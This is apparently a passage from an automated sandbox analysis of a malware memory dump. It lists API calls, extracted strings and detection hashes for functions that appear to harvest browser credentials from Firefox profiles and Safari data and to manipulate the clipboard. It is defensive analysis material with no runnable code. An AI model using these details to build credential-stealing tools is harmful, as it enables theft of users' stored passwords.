                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                            • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                            • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                            • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                            • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                            • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                            • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
                                                          • String ID:
                                                          • API String ID: 1828521557-0
                                                          • Opcode ID: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                                          • Instruction ID: 9d1500c39017731ad640c46c84131142cb98d7893e2d711cbdbff08f65233ce4
                                                          • Opcode Fuzzy Hash: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                                          • Instruction Fuzzy Hash: 4B1186B294011D7BEB10E751DC4AFDB776CEF51328F10047FB518A50C2E6B8AAC486A9
                                                          Function 004068BF Relevance: 1.3, APIs: 1, Instructions: 59COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                            • Part of subcall function 004062A6: SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                                          • memcpy.MSVCRT ref: 00406942
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: ??2@FilePointermemcpy
                                                          • String ID:
                                                          • API String ID: 609303285-0
                                                          • Opcode ID: cfa0e116d589173c1f74b587a6cbbf9e28bf831d76649fdc759f8710e9f20be5
                                                          • Instruction ID: a147fa8ec668463fbbadbca9a08a444fcb23aa95a0ceadfc627c4072e562ebd5
                                                          • Opcode Fuzzy Hash: cfa0e116d589173c1f74b587a6cbbf9e28bf831d76649fdc759f8710e9f20be5
                                                          • Instruction Fuzzy Hash: 4B11A7B2500108BBDB11A755C840F9F77ADDF85318F16807AF90677281C778AE2687A9
                                                          Function 00406B90 Relevance: 1.3, APIs: 1, Instructions: 56COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: _wcsicmp
                                                          • String ID:
                                                          • API String ID: 2081463915-0
                                                          • Opcode ID: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                                                          • Instruction ID: 44e68c08f8902dbc9d3bec9e3d7b81d72528a2b8c41660eeece459a1934edfa0
                                                          • Opcode Fuzzy Hash: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                                                          • Instruction Fuzzy Hash: 0C118CB1600205AFD710DF65C8809AAB7F8FF44314F11843EE55AE7240EB34F9658B68
                                                          Function 00406214 Relevance: 1.3, APIs: 1, Instructions: 39COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF,00406224,00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF), ref: 0040629C
                                                            • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                          • GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
                                                            • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: File$CloseCreateErrorHandleLastRead
                                                          • String ID:
                                                          • API String ID: 2136311172-0
                                                          • Opcode ID: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                          • Instruction ID: 5eec059ee86d0bbb8aaa5289f200f29bbda103cdac5cb86a40c163b72aa3aa4c
                                                          • Opcode Fuzzy Hash: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                          • Instruction Fuzzy Hash: 3F01D6B14017018FD7206B70CD05BA273D8EF10319F11897EE55BE62D1EB3C9861866E
                                                          Function 0040AFCF Relevance: 1.3, APIs: 1, Instructions: 12COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT ref: 0040B052
                                                          • ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: ??2@??3@
                                                          • String ID:
                                                          • API String ID: 1936579350-0
                                                          • Opcode ID: d9146978952df4032bb52ee1fc914549b8afd9994305f4c2f79ca13836f6df5d
                                                          • Instruction ID: 89dc8af08517091935dcea8fd058adf4401913b4726dbdea6cb301b2924d739e
                                                          • Opcode Fuzzy Hash: d9146978952df4032bb52ee1fc914549b8afd9994305f4c2f79ca13836f6df5d
                                                          • Instruction Fuzzy Hash: 8FC02B7240C2100FD730FF74340205736D4CE422203028C2FE0E4D3101DB3C840103C8

                                                          Non-executed Functions

                                                          Function 004098E2 Relevance: 16.6, APIs: 11, Instructions: 59clipboardmemoryfileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • EmptyClipboard.USER32 ref: 004098EC
                                                            • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                          • GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                                          • GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                                                          • GlobalFix.KERNEL32(00000000), ref: 00409927
                                                          • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                                          • GlobalUnWire.KERNEL32(00000000), ref: 0040994C
                                                          • SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                                                          • GetLastError.KERNEL32 ref: 0040995D
                                                          • CloseHandle.KERNEL32(?), ref: 00409969
                                                          • GetLastError.KERNEL32 ref: 00409974
                                                          • CloseClipboard.USER32 ref: 0040997D
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleReadSizeWire
                                                          • String ID:
                                                          • API String ID: 2565263379-0
                                                          • Opcode ID: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                          • Instruction ID: b216396755dc4e0bfb1664a9ae46c4c33dbc75b884417c11e98c88a04b476fe2
                                                          • Opcode Fuzzy Hash: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                          • Instruction Fuzzy Hash: 3D113D7A540204BBE7105FA6DC4CA9E7B78FB06356F10457AF902E22A1DB748901CB69
                                                          Function 0040987A Relevance: 12.0, APIs: 8, Instructions: 42clipboardmemoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • EmptyClipboard.USER32 ref: 00409882
                                                          • wcslen.MSVCRT ref: 0040988F
                                                          • GlobalAlloc.KERNEL32(00002000,00000002,?,?,?,?,00411A1E,-00000210), ref: 0040989F
                                                          • GlobalFix.KERNEL32(00000000), ref: 004098AC
                                                          • memcpy.MSVCRT ref: 004098B5
                                                          • GlobalUnWire.KERNEL32(00000000), ref: 004098BE
                                                          • SetClipboardData.USER32(0000000D,00000000), ref: 004098C7
                                                          • CloseClipboard.USER32 ref: 004098D7
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: ClipboardGlobal$AllocCloseDataEmptyWirememcpywcslen
                                                          • String ID:
                                                          • API String ID: 2014503067-0
                                                          • Opcode ID: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
                                                          • Instruction ID: b754b6ca90195c8d8a6f67e3e00c953256c5cf8724ac1a445a604cc17dd28da6
                                                          • Opcode Fuzzy Hash: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
                                                          • Instruction Fuzzy Hash: 4AF0967B1402246BD2112FA6AC4DD2B772CFB86B56B05013AF90592251DA3448004779
                                                          Function 004182CE Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetLastError.KERNEL32 ref: 004182D7
                                                            • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                          • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 004182FE
                                                          • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00418327
                                                          • LocalFree.KERNEL32(?), ref: 00418342
                                                          • ??3@YAXPAX@Z.MSVCRT ref: 00418370
                                                            • Part of subcall function 00417434: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,7591DF80,?,0041755F,?), ref: 00417452
                                                            • Part of subcall function 00417434: malloc.MSVCRT ref: 00417459
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: FormatMessage$??3@ByteCharErrorFreeLastLocalMultiVersionWidemalloc
                                                          • String ID: OsError 0x%x (%u)
                                                          • API String ID: 403622227-2664311388
                                                          • Opcode ID: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                                                          • Instruction ID: 20f22e5b187e4483f2e635e74e626e0383ca95cf640bb4168ff376264581b0c9
                                                          • Opcode Fuzzy Hash: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                                                          • Instruction Fuzzy Hash: 6011B634901128FBCB11ABE2DC49CDF7F78FF85B54B10405AF811A2251DB754A81D7A9
                                                          Function 0041739B Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetVersionExW.KERNEL32(?), ref: 004173BE
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: Version
                                                          • String ID:
                                                          • API String ID: 1889659487-0
                                                          • Opcode ID: 65fe17fce0a62211919799e39ce3b7c1e35ae55805528a641db57f2e5b506d3e
                                                          • Instruction ID: 34334e4c1a53cba42546035453d5331cf18162d9798f59f763323439a3546438
                                                          • Opcode Fuzzy Hash: 65fe17fce0a62211919799e39ce3b7c1e35ae55805528a641db57f2e5b506d3e
                                                          • Instruction Fuzzy Hash: BAE0463590131CCFEB24DB34DB0B7C676F5AB08B46F0104F4C20AC2092D3789688CA2A
                                                          Function 00402279 Relevance: 110.5, APIs: 9, Strings: 54, Instructions: 285COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • _wcsicmp.MSVCRT ref: 004022A6
                                                          • _wcsicmp.MSVCRT ref: 004022D7
                                                          • _wcsicmp.MSVCRT ref: 00402305
                                                          • _wcsicmp.MSVCRT ref: 00402333
                                                            • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                            • Part of subcall function 0040AA29: memcpy.MSVCRT ref: 0040AA5B
                                                          • memset.MSVCRT ref: 0040265F
                                                          • memcpy.MSVCRT ref: 0040269B
                                                            • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                            • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                          • memcpy.MSVCRT ref: 004026FF
                                                          • LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402764
                                                          • FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402775
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: _wcsicmp$Freememcpy$Library$AddressLocalProcmemsetwcslen
                                                          • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
                                                          • API String ID: 577499730-1134094380
                                                          • Opcode ID: 9397f4940cefbe0ceec442a857739dd93941f810d0ac8ce2dbc103f0b42f9f84
                                                          • Instruction ID: 24bcbd005531c38afe4d7004bd238553ea51a424b60caac2517de9c8923e7683
                                                          • Opcode Fuzzy Hash: 9397f4940cefbe0ceec442a857739dd93941f810d0ac8ce2dbc103f0b42f9f84
                                                          • Instruction Fuzzy Hash: 8FE1F32010C7C19DD332D678884978BBFD45BA7328F484B9EF1E89A2D2D7B98509C767
                                                          Function 0040C87B Relevance: 54.5, APIs: 27, Strings: 4, Instructions: 285stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: _wcsicmpmemset$_wcsnicmpwcslen$ByteCharMultiWidewcschrwcscpy$memcpystrchrstrlen
                                                          • String ID: :stringdata$ftp://$http://$https://
                                                          • API String ID: 2787044678-1921111777
                                                          • Opcode ID: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                                                          • Instruction ID: 1dd8f84a331a8d1f0195812dc1f06ff326a48265e58e3ad24d859c5fcdf3acb9
                                                          • Opcode Fuzzy Hash: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                                                          • Instruction Fuzzy Hash: C191C571540219AEEF10EF65DC82EEF776DEF41318F01016AF948B7181EA38ED518BA9
                                                          Function 00414002 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 265COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetDlgItem.USER32(?,000003E9), ref: 0041402F
                                                          • GetDlgItem.USER32(?,000003E8), ref: 0041403B
                                                          • GetWindowLongW.USER32(00000000,000000F0), ref: 0041404A
                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00414056
                                                          • GetWindowLongW.USER32(00000000,000000EC), ref: 0041405F
                                                          • GetWindowLongW.USER32(?,000000EC), ref: 0041406B
                                                          • GetWindowRect.USER32(00000000,?), ref: 0041407D
                                                          • GetWindowRect.USER32(?,?), ref: 00414088
                                                          • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041409C
                                                          • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004140AA
                                                          • GetDC.USER32 ref: 004140E3
                                                          • wcslen.MSVCRT ref: 00414123
                                                          • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00414134
                                                          • ReleaseDC.USER32(?,?), ref: 00414181
                                                          • _snwprintf.MSVCRT ref: 00414244
                                                          • SetWindowTextW.USER32(?,?), ref: 00414258
                                                          • SetWindowTextW.USER32(?,00000000), ref: 00414276
                                                          • GetDlgItem.USER32(?,00000001), ref: 004142AC
                                                          • GetWindowRect.USER32(00000000,?), ref: 004142BC
                                                          • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004142CA
                                                          • GetClientRect.USER32(?,?), ref: 004142E1
                                                          • GetWindowRect.USER32(?,?), ref: 004142EB
                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00414331
                                                          • GetClientRect.USER32(?,?), ref: 0041433B
                                                          • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00414373
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
                                                          • String ID: %s:$EDIT$STATIC
                                                          • API String ID: 2080319088-3046471546
                                                          • Opcode ID: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                                          • Instruction ID: eff71af8639f47ea0b7533f6321954d8b94ad3b67000e3ed03306cc56154d199
                                                          • Opcode Fuzzy Hash: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                                          • Instruction Fuzzy Hash: F8B1DF71108301AFD721DFA9C985E6BBBF9FF88704F004A2DF69582261DB75E9448F16
                                                          Function 004131DC Relevance: 42.2, APIs: 22, Strings: 2, Instructions: 214windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • EndDialog.USER32(?,?), ref: 00413221
                                                          • GetDlgItem.USER32(?,000003EA), ref: 00413239
                                                          • SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00413257
                                                          • SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00413263
                                                          • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0041326B
                                                          • memset.MSVCRT ref: 00413292
                                                          • memset.MSVCRT ref: 004132B4
                                                          • memset.MSVCRT ref: 004132CD
                                                          • memset.MSVCRT ref: 004132E1
                                                          • memset.MSVCRT ref: 004132FB
                                                          • memset.MSVCRT ref: 00413310
                                                          • GetCurrentProcess.KERNEL32 ref: 00413318
                                                          • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041333B
                                                          • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0041336D
                                                          • memset.MSVCRT ref: 004133C0
                                                          • GetCurrentProcessId.KERNEL32 ref: 004133CE
                                                          • memcpy.MSVCRT ref: 004133FC
                                                          • wcscpy.MSVCRT ref: 0041341F
                                                          • _snwprintf.MSVCRT ref: 0041348E
                                                          • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004134A6
                                                          • GetDlgItem.USER32(?,000003EA), ref: 004134B0
                                                          • SetFocus.USER32(00000000), ref: 004134B7
                                                          Strings
                                                          • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00413483
                                                          • {Unknown}, xrefs: 004132A6
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                                          • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                                          • API String ID: 4111938811-1819279800
                                                          • Opcode ID: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                                          • Instruction ID: fb691a4f2f0ee0f23db40d54bf7b3fb7beca904c55697b54c7815e943e903c38
                                                          • Opcode Fuzzy Hash: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                                          • Instruction Fuzzy Hash: A97182B280021DBFEB219F51DC45EEA3B7CFB08355F0440B6F508A6161DB799E948F69
                                                          Function 00401198 Relevance: 39.2, APIs: 26, Instructions: 185COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetDlgItem.USER32(?,000003EC), ref: 004011F0
                                                          • ChildWindowFromPoint.USER32(?,?,?), ref: 00401202
                                                          • GetDlgItem.USER32(?,000003EE), ref: 00401238
                                                          • ChildWindowFromPoint.USER32(?,?,?), ref: 00401245
                                                          • GetDlgItem.USER32(?,000003EC), ref: 00401273
                                                          • ChildWindowFromPoint.USER32(?,?,?), ref: 00401285
                                                          • GetModuleHandleW.KERNEL32(00000000,?,?), ref: 0040128E
                                                          • LoadCursorW.USER32(00000000,00000067), ref: 00401297
                                                          • SetCursor.USER32(00000000,?,?), ref: 0040129E
                                                          • GetDlgItem.USER32(?,000003EE), ref: 004012BF
                                                          • ChildWindowFromPoint.USER32(?,?,?), ref: 004012CC
                                                          • GetDlgItem.USER32(?,000003EC), ref: 004012E6
                                                          • SetBkMode.GDI32(?,00000001), ref: 004012F2
                                                          • SetTextColor.GDI32(?,00C00000), ref: 00401300
                                                          • GetSysColorBrush.USER32(0000000F), ref: 00401308
                                                          • GetDlgItem.USER32(?,000003EE), ref: 00401329
                                                          • EndDialog.USER32(?,?), ref: 0040135E
                                                          • DeleteObject.GDI32(?), ref: 0040136A
                                                          • GetDlgItem.USER32(?,000003ED), ref: 0040138F
                                                          • ShowWindow.USER32(00000000), ref: 00401398
                                                          • GetDlgItem.USER32(?,000003EE), ref: 004013A4
                                                          • ShowWindow.USER32(00000000), ref: 004013A7
                                                          • SetDlgItemTextW.USER32(?,000003EE,0045D778), ref: 004013B8
                                                          • SetWindowTextW.USER32(?,00000000), ref: 004013CA
                                                          • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004013E2
                                                          • SetDlgItemTextW.USER32(?,000003EC,?), ref: 004013F3
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                                          • String ID:
                                                          • API String ID: 829165378-0
                                                          • Opcode ID: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                                          • Instruction ID: caa3714a391556dce09a7e5fb0b25e31ef738818e6d8753142f97b5ec5ee2caf
                                                          • Opcode Fuzzy Hash: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                                          • Instruction Fuzzy Hash: 0051B134500708AFEB32AF61DC85E6E7BB9FB44301F10093AF552A61F1C7B9A991DB19
                                                          Function 0040414F Relevance: 35.1, APIs: 13, Strings: 7, Instructions: 145COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • memset.MSVCRT ref: 00404172
                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                            • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                          • wcscpy.MSVCRT ref: 004041D6
                                                          • wcscpy.MSVCRT ref: 004041E7
                                                          • memset.MSVCRT ref: 00404200
                                                          • memset.MSVCRT ref: 00404215
                                                          • _snwprintf.MSVCRT ref: 0040422F
                                                          • wcscpy.MSVCRT ref: 00404242
                                                          • memset.MSVCRT ref: 0040426E
                                                          • memset.MSVCRT ref: 004042CD
                                                          • memset.MSVCRT ref: 004042E2
                                                          • _snwprintf.MSVCRT ref: 004042FE
                                                          • wcscpy.MSVCRT ref: 00404311
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: memset$wcscpy$_snwprintfwcslen$AttributesFilewcscat
                                                          • String ID: AE$General$IsRelative$Path$Profile%d$profiles.ini$EA
                                                          • API String ID: 2454223109-1580313836
                                                          • Opcode ID: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                                          • Instruction ID: 5f54f20862f9259acc4f568515dc65a5c395277ecd0331c6beb9e3a358a2eb32
                                                          • Opcode Fuzzy Hash: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                                          • Instruction Fuzzy Hash: 18512FB294012CBADB20EB55DC45ECFB7BCBF55744F0040E6B50CA2142EA795B84CFAA
                                                          Function 00411346 Relevance: 31.8, APIs: 13, Strings: 5, Instructions: 263windowregistryclipboardCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 0040D407: LoadMenuW.USER32(00000000), ref: 0040D40F
                                                          • SetMenu.USER32(?,00000000), ref: 00411453
                                                          • SendMessageW.USER32(00000000,00000404,00000001,?), ref: 00411486
                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 00411495
                                                          • LoadImageW.USER32(00000000,00000068,00000000,00000000,00000000,00009060), ref: 004114A2
                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 004114D9
                                                          • CreateWindowExW.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000,00000000), ref: 00411500
                                                          • memcpy.MSVCRT ref: 004115C8
                                                          • ShowWindow.USER32(?,?), ref: 004115FE
                                                          • GetFileAttributesW.KERNEL32(0045E078), ref: 0041162F
                                                          • GetTempPathW.KERNEL32(00000104,0045E078), ref: 0041163F
                                                          • RegisterClipboardFormatW.USER32(commdlg_FindReplace), ref: 0041167A
                                                          • SendMessageW.USER32(?,00000404,00000002,?), ref: 004116B4
                                                          • SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 004116C7
                                                            • Part of subcall function 00404592: wcslen.MSVCRT ref: 004045AF
                                                            • Part of subcall function 00404592: SendMessageW.USER32(?,00001061,?,?), ref: 004045D3
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$HandleLoadMenuModuleWindow$AttributesClipboardCreateFileFormatImagePathRegisterShowTempmemcpywcslen
                                                          • String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html$xE
                                                          • API String ID: 4054529287-3175352466
                                                          • Opcode ID: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                                          • Instruction ID: 800f7bfcdfcb1fd3e7c20450dd8eb4425a557a8a4e928c852398501c1500280f
                                                          • Opcode Fuzzy Hash: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
